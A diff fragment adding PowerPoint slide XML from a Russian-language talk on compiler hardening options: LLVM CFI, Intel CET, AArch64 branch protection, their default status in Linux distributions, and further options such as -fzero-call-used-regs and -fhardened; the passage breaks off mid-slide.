+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LLVM CFI:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не включена по умолчанию ни в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>ни в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu, Debian, Fedora</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включается по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=cfi</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (также требует </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>flto</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=thin -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fvisibility</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=hidden</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LTO </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>нужна для построения полного </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>call graph </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>программы, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>visibility </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>для сокращения внешних вызовов</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Для межбиблиотечных вызовов нужна </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-cfi-cross-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>dso</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>замедляет выполнение)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Intel CET:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включается по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fcf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protection</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Раньше ещё нужно было указывать флаги `-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>mcet</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>`, `-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>mshstk</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>` </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и `-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>mibt</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>`,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> но теперь нет</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включена по умолчанию в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Toolchain: Compiler flags</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>AArch64 CFI:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включается по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>mbranch</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protection=standard</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Никто не знает</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>почему не использовали </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fcf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protection</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> :(</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1540958368"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide78.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A565717-4BAA-4EF0-AE04-1234344C22C6}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5643B7A-2796-4C8D-BF20-1D8525E29A55}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включена по дефолту на Android</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LLVM CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не включена дефолтно для пакетов в Ubuntu, Debian, Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LTO + </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>отсутствие поддержки в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Intel CET и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>AArch64 CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>дефолтно включён для пакетов в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Ubuntu</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Fedora</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> и</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>Debian</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>C</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>hecksec не обнаруживает</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>LLVM CFI (непонятно как это сделать)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и Intel CET (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>checksec #302</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="500758875"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide79.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FBBCCBC-F667-4231-85BA-0357462E7F40}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Другие опции</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Text Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF1E393-523C-4524-B32D-C3F28EF2422D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1762390909"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -23886,6 +25487,683 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4210201379"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide80.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6713E613-45DE-4720-BCF2-4F99AC6FFAD0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Что дальше </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF6B1F09-94BF-48D9-B780-866C5F1B0092}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>О некоторых опциях мы не успели поговорить</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Опции для очистки секретов (паролей, ключей</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, etc.):</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>S</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>tack scrubbing – очистка</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>стека при выходе из функции (-fstrub)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Очистка регистров при выходе из функции </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>-fzero-call-used-regs</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Опции для защиты от аппаратных атак </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Spectre</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, etc.)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>fhardened</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>– зонтичная</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>опция для наиболее важных </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardened-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>оптимизаций</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включает все опции, рекомендованные </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>OpenSSF</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Compiler Options Hardening Guide for C and C++</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
